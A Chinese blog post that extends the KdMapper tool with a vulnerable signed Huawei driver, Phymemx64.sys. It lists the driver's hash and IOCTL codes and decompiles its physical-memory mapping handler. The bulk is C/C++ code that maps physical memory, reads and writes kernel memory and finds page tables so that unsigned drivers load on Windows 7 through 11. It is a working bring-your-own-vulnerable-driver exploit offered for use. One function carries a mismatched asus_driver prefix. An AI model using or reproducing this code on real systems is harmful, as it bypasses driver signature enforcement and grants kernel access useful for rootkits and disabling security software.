首页 > 其他分享 >KdMapper扩展实现之Huawei(Phymemx64.sys)

KdMapper扩展实现之Huawei(Phymemx64.sys)

时间:2023-09-14 20:56:28浏览次数:44  
标签:__ ULONG Object request sys Huawei KdMapper ntStatus PVOID

1.背景

  KdMapper是一个利用intel的驱动漏洞可以无痕的加载未经签名的驱动,本文是利用其它漏洞(参考《【转载】利用签名驱动漏洞加载未签名驱动》)做相应的修改以实现类似功能。需要大家对KdMapper的代码有一定了解。

 

2.驱动信息

 

驱动名称 Phymemx64.sys 
时间戳 58355A99
MD5 715572DFE6FB10B16F980BFA242F3FA5
文件版本
映射物理内存 0x80102040
取消映射物理内存 0x80102044
Windows 7 支持
Windows 10 22H2(包含)及以下
Windows 11 22621(不包含)以下

 

3.IDA分析

3.1 入口函数:

NTSTATUS __stdcall DriverEntry(_DRIVER_OBJECT* DriverObject, PUNICODE_STRING RegistryPath)
{
        NTSTATUS result; // eax
        NTSTATUS v4; // ebx
        __int64 (*v5)(void); // rax

        if (!DriverObject)
                return CreateDevice(0i64);
        qword_140003D10 = (__int64)DriverObject;
        DestinationString.MaximumLength = 520;
        DestinationString.Length = 0;
        DestinationString.Buffer = (PWSTR)&unk_140003D20;
        RtlCopyUnicodeString(&DestinationString, RegistryPath);
        result = WdfVersionBind(DriverObject, &DestinationString, &unk_140003010, &qword_140003D08);
        if (result >= 0)
        {
                v4 = sub_140001228((__int64)&unk_140003010);
                if (v4 < 0 || (sub_1400012B0(), v4 = CreateDevice(DriverObject), v4 < 0))
                {
                        sub_140001000();
                        result = v4;
                }
                else
                {
                        if (*(_BYTE*)(qword_140003D08 + 48))
                        {
                                v5 = qword_140003CF8;
                                if (DriverObject->DriverUnload)
                                        v5 = (__int64 (*)(void))DriverObject->DriverUnload;
                                qword_140003CF8 = v5;
                                DriverObject->DriverUnload = (PDRIVER_UNLOAD)sub_140001038;
                        }
                        else if ((*(_BYTE*)(qword_140003D08 + 8) & 2) != 0)
                        {
                                qword_140003D00 = qword_1400036C8;
                                qword_1400036C8 = (__int64)sub_140001030;
                        }
                        result = 0;
                }
        }
        return result;
}

 

3.2 创建设备和符号链接

__int64 __fastcall CreateDevice(PDRIVER_OBJECT DriverObject)
{
        NTSTATUS v2; // ebx
        struct _UNICODE_STRING DeviceName; // [rsp+40h] [rbp-28h] BYREF
        struct _UNICODE_STRING DestinationString; // [rsp+50h] [rbp-18h] BYREF
        PDEVICE_OBJECT DeviceObject; // [rsp+80h] [rbp+18h] BYREF

        DeviceObject = 0i64;
        RtlInitUnicodeString(&DeviceName, L"\\Device\\PhyMem");
        v2 = IoCreateDevice(DriverObject, 0, &DeviceName, 0x8010u, 0, 0, &DeviceObject);
        if (v2 >= 0)
        {
                DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)DeviceIoControl;
                DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)DeviceIoControl;
                DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)DeviceIoControl;
                DriverObject->DriverUnload = (PDRIVER_UNLOAD)sub_1400017A0;
                RtlInitUnicodeString(&DestinationString, L"\\DosDevices\\PhyMem");
                v2 = IoCreateSymbolicLink(&DestinationString, &DeviceName);
                if (v2 < 0)
                        IoDeleteDevice(DeviceObject);
        }
        return (unsigned int)v2;
}

 

3.3 DeviceIoControl

其代码如下:

__int64 __fastcall DeviceIoControl(PDEVICE_OBJECT pDeviceObject, IRP* pIrp)
{
	_IO_STACK_LOCATION* pIosp; // rcx
	_DWORD* pSystemBuffer; // rbx
	size_t nInputBufferLength; // rax
	ULONG nIoControlCode; // ecx
	unsigned __int32 v7; // eax
	size_t nMapBufferSize; // rsi
	NTSTATUS ntStatusMap; // er14
	unsigned int v10; // ebx
	unsigned __int16 Dst; // [rsp+30h] [rbp-40h] BYREF
	unsigned int v13; // [rsp+32h] [rbp-3Eh]
	char v14; // [rsp+36h] [rbp-3Ah]
	PHYMEMEX64_MAP_UNMAP_PHISICAL_MEMORY_INFO Src; // [rsp+38h] [rbp-38h] BYREF

	pIosp = pIrp->Tail.Overlay.CurrentStackLocation;
	pIrp->IoStatus.Status = 0;
	pIrp->IoStatus.Information = 0i64;
	pSystemBuffer = pIrp->AssociatedIrp.SystemBuffer;
	nInputBufferLength = pIosp->Parameters.DeviceIoControl.InputBufferLength;
	if (pIosp->MajorFunction != 14)
		goto LABEL_29;
	nIoControlCode = pIosp->Parameters.DeviceIoControl.IoControlCode;
	switch (nIoControlCode)
	{
	case 0x80102040:
		if (!(_DWORD)nInputBufferLength)
			goto LABEL_28;
		nMapBufferSize = nInputBufferLength;
		memmove(&Src, pIrp->AssociatedIrp.SystemBuffer, nInputBufferLength);
		ntStatusMap = MapPhysicalAddress(
			Src.PhysicalAddress,
			Src.Size,
			&Src.MappedAddress,
			&Src.SectionHandle,
			&Src.Object);
		if (ntStatusMap >= 0)
		{
			memmove(pSystemBuffer, &Src, nMapBufferSize);
			pIrp->IoStatus.Information = nMapBufferSize;
		}
		pIrp->IoStatus.Status = ntStatusMap;
		break;
	case 0x80102044:
		if ((_DWORD)nInputBufferLength)
		{
			memmove(&Src, pIrp->AssociatedIrp.SystemBuffer, nInputBufferLength);
			pIrp->IoStatus.Status = UnmapPhysicalAddress(Src.SectionHandle, Src.MappedAddress, Src.Object);
			break;
		}
		goto LABEL_28;
	case 0x80102050:
		if (!(_DWORD)nInputBufferLength)
			goto LABEL_28;
		memmove(&Dst, pIrp->AssociatedIrp.SystemBuffer, nInputBufferLength);
		switch (v14)
		{
		case 1:
			LOBYTE(v7) = __inbyte(Dst);
			v7 = (unsigned __int8)v7;
			break;
		case 2:
			LOWORD(v7) = __inword(Dst);
			v7 = (unsigned __int16)v7;
			break;
		case 4:
			v7 = __indword(Dst);
			break;
		default:
			v7 = v13;
			break;
		}
		*pSystemBuffer = v7;
		pIrp->IoStatus.Information = 4i64;
		break;
	default:
		if (nIoControlCode == -2146426796 && (_DWORD)nInputBufferLength)
		{
			memmove(&Dst, pIrp->AssociatedIrp.SystemBuffer, (unsigned int)nInputBufferLength);
			switch (v14)
			{
			case 1:
				__outbyte(Dst, v13);
				break;
			case 2:
				__outword(Dst, v13);
				break;
			case 4:
				__outdword(Dst, v13);
				break;
			}
			break;
		}
	LABEL_28:
		pIrp->IoStatus.Status = 0xC000000D;
		break;
	}
LABEL_29:
	v10 = pIrp->IoStatus.Status;
	IofCompleteRequest(pIrp, 0);
	return v10;
}

  其中映射物理内存 ControlCode 为 0x80102040,相应的函数为 MapPhysicalAddress, 取消映射为 0x80102044,相应的函数为 UnmapPhysicalAddress。

 

3.4 映射物理内存

MapPhysicalAddress 如下:

__int64 __fastcall MapPhysicalAddress(PHYSICAL_ADDRESS BusAddress, ULONG_PTR nCommitSize, PVOID* pMappedAddress, HANDLE* hSection, PVOID* pObject)
{
	PVOID* Object; // rbx
	NTSTATUS ntStatus; // edi
	BOOLEAN ntStatusTranslateTemp; // al
	BOOLEAN ntStatusTranslate; // bl
	BOOLEAN ntStatusBus; // al
	LARGE_INTEGER BusAddressa; // [rsp+50h] [rbp-31h] BYREF
	LARGE_INTEGER TranslatedAddress; // [rsp+58h] [rbp-29h] BYREF
	union _LARGE_INTEGER SectionOffset; // [rsp+60h] [rbp-21h] BYREF
	PVOID BaseAddress; // [rsp+68h] [rbp-19h] BYREF
	struct _UNICODE_STRING DestinationString; // [rsp+70h] [rbp-11h] BYREF
	struct _OBJECT_ATTRIBUTES ObjectAttributes; // [rsp+80h] [rbp-1h] BYREF
	ULONG_PTR CommitSize; // [rsp+E8h] [rbp+67h] BYREF
	ULONG AddressSpace; // [rsp+F8h] [rbp+77h] BYREF

	CommitSize = nCommitSize;
	BaseAddress = 0i64;
	RtlInitUnicodeString(&DestinationString, L"\\Device\\PhysicalMemory");
	*hSection = 0i64;
	Object = pObject;
	ObjectAttributes.RootDirectory = 0i64;
	ObjectAttributes.Length = 48;
	ObjectAttributes.Attributes = 64;
	*pObject = 0i64;
	ObjectAttributes.ObjectName = &DestinationString;
	*(_OWORD*)&ObjectAttributes.SecurityDescriptor = 0i64;
	ntStatus = ZwOpenSection(hSection, 0xF001Fu, &ObjectAttributes);
	if (ntStatus < 0)
		goto LABEL_9;
	ntStatus = ObReferenceObjectByHandle(*hSection, 0xF001Fu, 0i64, 0, Object, 0i64);
	if (ntStatus < 0)
		goto LABEL_9;
	AddressSpace = 0;
	TranslatedAddress = BusAddress;
	BusAddressa.QuadPart = BusAddress.QuadPart + CommitSize;
	ntStatusTranslateTemp = HalTranslateBusAddress(Isa, 0, BusAddress, &AddressSpace, &TranslatedAddress);
	AddressSpace = 0;
	ntStatusTranslate = ntStatusTranslateTemp;
	ntStatusBus = HalTranslateBusAddress(Isa, 0, BusAddressa, &AddressSpace, &BusAddressa);
	if (ntStatusTranslate && ntStatusBus)
	{
		SectionOffset = TranslatedAddress;
		CommitSize = BusAddressa.QuadPart - TranslatedAddress.QuadPart;
		ntStatus = ZwMapViewOfSection(
			*hSection,
			(HANDLE)0xFFFFFFFFFFFFFFFFi64,
			&BaseAddress,
			0i64,
			BusAddressa.QuadPart - TranslatedAddress.QuadPart,
			&SectionOffset,
			&CommitSize,
			ViewShare,
			0,
			0x204u);
		if (ntStatus == 0xC0000018)
			ntStatus = ZwMapViewOfSection(
				*hSection,
				(HANDLE)0xFFFFFFFFFFFFFFFFi64,
				&BaseAddress,
				0i64,
				CommitSize,
				&SectionOffset,
				&CommitSize,
				ViewShare,
				0,
				4u);
		if (ntStatus >= 0)
		{
			*pMappedAddress = (char*)BaseAddress + TranslatedAddress.QuadPart - SectionOffset.QuadPart;
			return (unsigned int)ntStatus;
		}
	LABEL_9:
		ZwClose(*hSection);
	}
	return (unsigned int)ntStatus;
}

  其使用的是ZwMapViewOfSection将物理内存映射到进程空间。由于使用了物理内存,在代码过程中会遇到物理页面和虚拟页面不一一对应的问题,问题说明及解决办法见《KdMapper扩展中遇到的相关问题》

 

3.5 取消映射物理内存

__int64 __fastcall UnmapPhysicalAddress(HANDLE Handle, void* MappedAddress, void* Object)
{
	unsigned int ntStatus; // esi

	ntStatus = ZwUnmapViewOfSection((HANDLE)0xFFFFFFFFFFFFFFFFi64, MappedAddress);
	if (Object)
		ObfDereferenceObject(Object);
	ZwClose(Handle);
	return ntStatus;
}

 

3.6 PHYMEMEX64_MAP_UNMAP_PHISICAL_MEMORY_INFO结构

00000000 PHYMEMEX64_MAP_UNMAP_PHISICAL_MEMORY_INFO struc ; (sizeof=0x28, copyof_381)
00000000                                         ; XREF: DeviceIoControl/r
00000000 Size            dq ?                    ; XREF: DeviceIoControl+15D/r
00000008 PhysicalAddress PHYSICAL_ADDRESS ?      ; XREF: DeviceIoControl+165/r
00000010 SectionHandle   dq ?                    ; XREF: DeviceIoControl+139/r
00000010                                         ; DeviceIoControl+169/o ; offset
00000018 MappedAddress   dq ?                    ; XREF: DeviceIoControl+135/r
00000018                                         ; DeviceIoControl+16D/o ; offset
00000020 Object          dq ?                    ; XREF: DeviceIoControl+131/r
00000020                                         ; DeviceIoControl+161/o ; offset
00000028 PHYMEMEX64_MAP_UNMAP_PHISICAL_MEMORY_INFO ends

 

4. 代码实现

4.1 .h文件

#pragma pack(push)
#pragma pack(1)
        typedef struct _PHYMEMX64_PHYSICAL_MEMORY_INFO {
                SIZE_T MapSize;
                PHYSICAL_ADDRESS PhysicalAddress;
                PVOID SectionHandle;
                PVOID MappedBaseAddress;
                PVOID Object;
        } PHYMEMX64_PHYSICAL_MEMORY_INFO, * PPHYMEMX64_PHYSICAL_MEMORY_INFO;
#pragma pack(pop)

#ifndef RtlOffsetToPointer
#define RtlOffsetToPointer(Base, Offset)  ((PCHAR)( ((PCHAR)(Base)) + ((ULONG_PTR)(Offset))  ))
#endif

#ifndef RtlPointerToOffset
#define RtlPointerToOffset(Base, Pointer)  ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base))  ))
#endif

#define PHYMEMX64_DEVICE_TYPE          (DWORD)0x8010
#define PHYMEMX64_MAP_SECTION_FUNCID   (DWORD)0x810
#define PHYMEMX64_UNMAP_SECTION_FUNCID (DWORD)0x811	

#define IOCTL_PHYMEMX64_MAP_USER_PHYSICAL_MEMORY      \
    CTL_CODE(PHYMEMX64_DEVICE_TYPE, PHYMEMX64_MAP_SECTION_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102040

#define IOCTL_PHYMEMX64_UNMAP_USER_PHYSICAL_MEMORY    \
    CTL_CODE(PHYMEMX64_DEVICE_TYPE, PHYMEMX64_UNMAP_SECTION_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102044

 

4.2 .c文件

NTSTATUS huawei_driver::SuperCallDriverEx(
        _In_ HANDLE DeviceHandle,
        _In_ ULONG IoControlCode,
        _In_ PVOID InputBuffer,
        _In_ ULONG InputBufferLength,
        _In_opt_ PVOID OutputBuffer,
        _In_opt_ ULONG OutputBufferLength,
        _Out_opt_ PIO_STATUS_BLOCK IoStatus)
{
        IO_STATUS_BLOCK ioStatus;

        NTSTATUS ntStatus = NtDeviceIoControlFile(DeviceHandle,
                NULL,
                NULL,
                NULL,
                &ioStatus,
                IoControlCode,
                InputBuffer,
                InputBufferLength,
                OutputBuffer,
                OutputBufferLength);

        if (ntStatus == STATUS_PENDING) {

                ntStatus = NtWaitForSingleObject(DeviceHandle,
                        FALSE,
                        NULL);
        }

        if (IoStatus)
                *IoStatus = ioStatus;

        return ntStatus;
}

BOOL huawei_driver::SuperCallDriver(
        _In_ HANDLE DeviceHandle,
        _In_ ULONG IoControlCode,
        _In_ PVOID InputBuffer,
        _In_ ULONG InputBufferLength,
        _In_opt_ PVOID OutputBuffer,
        _In_opt_ ULONG OutputBufferLength)
{
        BOOL bResult;
        IO_STATUS_BLOCK ioStatus;

        NTSTATUS ntStatus = SuperCallDriverEx(
                DeviceHandle,
                IoControlCode,
                InputBuffer,
                InputBufferLength,
                OutputBuffer,
                OutputBufferLength,
                &ioStatus);

        bResult = NT_SUCCESS(ntStatus);
        SetLastError(RtlNtStatusToDosError(ntStatus));
        return bResult;
}

PVOID huawei_driver::SuperMapMemory(
        _In_ HANDLE DeviceHandle,
        _In_ ULONG_PTR PhysicalAddress,
        _In_ ULONG NumberOfBytes,
        _Inout_ HANDLE* SectionHandle,
        _Inout_ PVOID* Object
)
{
        ULONG_PTR offset;
        ULONG mapSize;
        PHYMEMX64_PHYSICAL_MEMORY_INFO request;

        RtlSecureZeroMemory(&request, sizeof(request));

        offset = PhysicalAddress & ~(PAGE_SIZE - 1);
        mapSize = (ULONG)(PhysicalAddress - offset) + NumberOfBytes;

        request.PhysicalAddress.QuadPart = PhysicalAddress;
        request.MapSize = mapSize;
        request.MappedBaseAddress = NULL;

        if (SuperCallDriver(DeviceHandle,
                IOCTL_PHYMEMX64_MAP_USER_PHYSICAL_MEMORY,
                &request,
                sizeof(request),
                &request,
                sizeof(request)))
        {
                if (SectionHandle)
                {
                        *SectionHandle = request.SectionHandle;
                }
                if (Object)
                {
                        *Object = request.Object;
                }
                return request.MappedBaseAddress;
        }
        else
        {
               
        }

        return NULL;
}

VOID huawei_driver::SuperUnmapMemory(_In_ HANDLE DeviceHandle, _In_ PVOID AdressToUnmap, HANDLE Section, PVOID Object)
{
        PHYMEMX64_PHYSICAL_MEMORY_INFO request;

        RtlSecureZeroMemory(&request, sizeof(request));

        request.MappedBaseAddress = AdressToUnmap;
        request.SectionHandle = Section;
        request.Object = Object;
        SuperCallDriver(DeviceHandle,
                IOCTL_PHYMEMX64_UNMAP_USER_PHYSICAL_MEMORY,
                &request,
                sizeof(request),
                &request,
                sizeof(request));
}

BOOL WINAPI huawei_driver::SuperReadWritePhysicalMemory(
        _In_ HANDLE DeviceHandle,
        _In_ ULONG_PTR PhysicalAddress,
        _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
        _In_ ULONG NumberOfBytes,
        _In_ BOOLEAN DoWrite)
{
        BOOL bResult = FALSE;
        DWORD dwError = ERROR_SUCCESS;
        PVOID mappedSection = NULL;
        ULONG_PTR offset;
        HANDLE hSection = NULL;
        PVOID pObject = NULL;
        //
        // Map physical memory section.
        //
        mappedSection = SuperMapMemory(DeviceHandle,
                PhysicalAddress,
                NumberOfBytes,
                &hSection,
                &pObject);

        if (mappedSection) {

                offset = PhysicalAddress - (PhysicalAddress & ~(PAGE_SIZE - 1));

                __try {

                        if (DoWrite) {
                                RtlCopyMemory(mappedSection/*RtlOffsetToPointer(mappedSection, offset)*/, Buffer, NumberOfBytes);
                        }
                        else {
                                RtlCopyMemory(Buffer, mappedSection /*RtlOffsetToPointer(mappedSection, offset)*/, NumberOfBytes);
                        }

                        bResult = TRUE;
                }
                __except (EXCEPTION_EXECUTE_HANDLER) {
                        bResult = FALSE;
                        dwError = GetExceptionCode();
                        Log(L"[!] Error AtszioReadWritePhysicalMemory Exception!" << std::endl);
                }

                //
                // Unmap physical memory section.
                //
                SuperUnmapMemory(DeviceHandle,
                        mappedSection,
                        hSection,
                        pObject);

        }
        else {
                dwError = GetLastError();
        }

        SetLastError(dwError);
        return bResult;
}

BOOL WINAPI huawei_driver::SuperReadPhysicalMemory(
        _In_ HANDLE DeviceHandle,
        _In_ ULONG_PTR PhysicalAddress,
        _In_ PVOID Buffer,
        _In_ ULONG NumberOfBytes)
{
        return SuperReadWritePhysicalMemory(DeviceHandle,
                PhysicalAddress,
                Buffer,
                NumberOfBytes,
                FALSE);
}

BOOL WINAPI huawei_driver::SuperWritePhysicalMemory(
        _In_ HANDLE DeviceHandle,
        _In_ ULONG_PTR PhysicalAddress,
        _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
        _In_ ULONG NumberOfBytes)
{
        return SuperReadWritePhysicalMemory(DeviceHandle,
                PhysicalAddress,
                Buffer,
                NumberOfBytes,
                TRUE);
}

BOOL WINAPI huawei_driver::SuperWriteKernelVirtualMemory(
        _In_ HANDLE DeviceHandle,
        _In_ ULONG_PTR Address,
        _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
        _In_ ULONG NumberOfBytes)
{
        BOOL bResult;
        ULONG_PTR physicalAddress = 0;

        SetLastError(ERROR_SUCCESS);

        bResult = SuperVirtualToPhysical(DeviceHandle,
                Address,
                &physicalAddress);

        if (bResult) {

                bResult = SuperReadWritePhysicalMemory(DeviceHandle,
                        physicalAddress,
                        Buffer,
                        NumberOfBytes,
                        TRUE);

        }

        return bResult;
}

BOOL WINAPI asus_driver::SuperReadKernelVirtualMemory(
        _In_ HANDLE DeviceHandle,
        _In_ ULONG_PTR Address,
        _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
        _In_ ULONG NumberOfBytes)
{
        BOOL bResult;
        ULONG_PTR physicalAddress = 0;

        SetLastError(ERROR_SUCCESS);

        bResult = SuperVirtualToPhysical(DeviceHandle,
                Address,
                &physicalAddress);

        if (bResult) {

                bResult = SuperReadWritePhysicalMemory(DeviceHandle,
                        physicalAddress,
                        Buffer,
                        NumberOfBytes,
                        FALSE);

        }

        return bResult;
}

BOOL WINAPI huawei_driver::SuperQueryPML4Value(
        _In_ HANDLE DeviceHandle,
        _Out_ ULONG_PTR* Value)
{
        ULONG_PTR pbLowStub1M = 0ULL, PML4 = 0;
        HANDLE hSection = NULL;
        PVOID Object = NULL;
        DWORD cbRead = 0x100000;

        *Value = 0;

        SetLastError(ERROR_SUCCESS);

        pbLowStub1M = (ULONG_PTR)SuperMapMemory(DeviceHandle,
                0ULL,
                cbRead,
                &hSection,
                &Object);

        if (pbLowStub1M) {

                PML4 = SuperGetPML4FromLowStub1M(pbLowStub1M);
                if (PML4)
                        *Value = PML4;

                SuperUnmapMemory(DeviceHandle,
                        (PVOID)pbLowStub1M,
                        hSection,
                        Object);

        }

        return (PML4 != 0);
}

  其中 SuperReadKernelVirtualMemory 和 SuperWriteKernelVirtualMemory 读写虚拟地址内存页面中的 虚拟地址转物理地址函数 SuperVirtualToPhysical 的实现在《KdMapper扩展实现之虚拟地址转物理地址 》一文中有介绍。

 

5. 运行效果

  Windows 10 22H2环境上运行的效果如下,其中驱动 HelloWorld.sys为未签名的驱动,其详细说明见文章《KdMapper被加载驱动的实现》

  

 

6.特别提示

  由于利用驱动数字签名问题,该程序只能在Windows 7、Windows 10 22H2(包含)及以下、Windows 11 22621(不包含)以下运行。其它版本的Windows 10 和 Windows 11 由于驱动数字证书被吊销而不能使用。

标签:__,ULONG,Object,request,sys,Huawei,KdMapper,ntStatus,PVOID
From: https://www.cnblogs.com/ImprisonedSoul/p/17703357.html

相关文章

  • Operating system error number 23 in a file operation
    参考:https://ask.csdn.net/questions/687101参考2:https://blog.csdn.net/qq_16557863/article/details/130686453showvariableslike'%error%'查找mysql的err.log文件地址.idb文件是什么?https://www.php.cn/faq/507603.htmlMySQL.ibd文件很大清理空间https://www.cn......
  • eosio.system智能合约介绍(四)合约部署介绍
    01目的本文档结合系统合约,介绍了合约部署的核心概念和步骤,包括合约部署过程以及setcode和setabi方法,帮助初学者和开发者快速了解和掌握EOS系统合约部署的相关知识。02概述“eosio.system”智能合约是eos的系统命令合约。这个合约几乎实现了eos全部的系统命令,包括创建账户、资源质押......
  • system_stm32f4xx.c文件配置时钟
    staticvoidSetSysClock(void){/******************************************************************************//*PLL(clockedbyHSE)usedasSystemclocksource*//***********************************************************......
  • 电气工程师必学------CODESYS v3.5 入门学习笔记(一)
    一、新建工程打开软件新建工程,如图此教程只是入门练习,所以这里一般情况下都是创建的Standardproject,也就是标准工程。窗口下方可以设置工程名称与存放位置。紧接着是选择设备与编译语言。初学者条件有限就直接上仿真,电脑是windowsx64的话设备选择上图所示就OK。语言这里我......
  • INFINI Easysearch 与兆芯完成产品兼容互认证
    近日,极限科技旗下软件产品INFINIEasysearch搜索引擎软件V1.0与兆芯完成兼容性测试,功能与稳定性良好,并获得兆芯产品兼容互认证书。此次兼容适配基于银河麒麟高级服务器操作系统V10SP3平台与兆芯ZX-C、ZX-C+、KX-5000、KX-6000、KH-20000、KH-30000、KH-40000等系列处理......
  • systemd病毒遏制流程参考
    systemd挖矿病毒遏制流程参考top查看进程占用情况systemctlstatus128724找出占用较高的恶意进程的相关进程killSTOP128724121095停止对应恶意PID进程,为服务器CPU降压(注:这里不推荐直接删除进程,因为挖矿往往存在定时任务,删除后还会自动生成,但停止恶意进程会使其陷......
  • System.OutOfMemoryException:“Exception_WasThrown”
    32位4g内存吃满了,改64位重新编译,我这个程序的问题32位程序,最大只能用4G内存,但实机需要远超4G,内存不足就会报这种错误  ......
  • KdMapper扩展实现之GMER(gmer64.sys)
    1.背景  KdMapper是一个利用intel的驱动漏洞可以无痕的加载未经签名的驱动,本文是利用其它漏洞(参考《【转载】利用签名驱动漏洞加载未签名驱动》)做相应的修改以实现类似功能。需要大家对KdMapper的代码有一定了解。 2.驱动信息 驱动名称gmer64.sys 时间戳56DFD0......
  • win2003系统system占用80端口的解决办法
    本人一直都是用APMServ在winxp中搭建本地服务器测试网站,但最近换了win2003系统,结果本来在XP正常使用的APMServ启动时死活都提示80端口被占用,换成8080端口,虽然提示服务启动了,但是本地网站却打不开,在cmd中用命令查找时,发现提示system占用了80端口。如何查看端口在win03的cmd命令窗口......
  • 80端口被system 占用解决方法
    今天启动Apache的时候老是提示失败,很简单,使用netstat-ano发现80端口被占用。如图所示: 按照PID来说:在任务管理器中查看PID的进程名 既然是system。那么应该不回是真正的系统。而是微软的其他系列产品的进程在运行。【注意:我已经在服务services.msc中结束了IISADmin服务......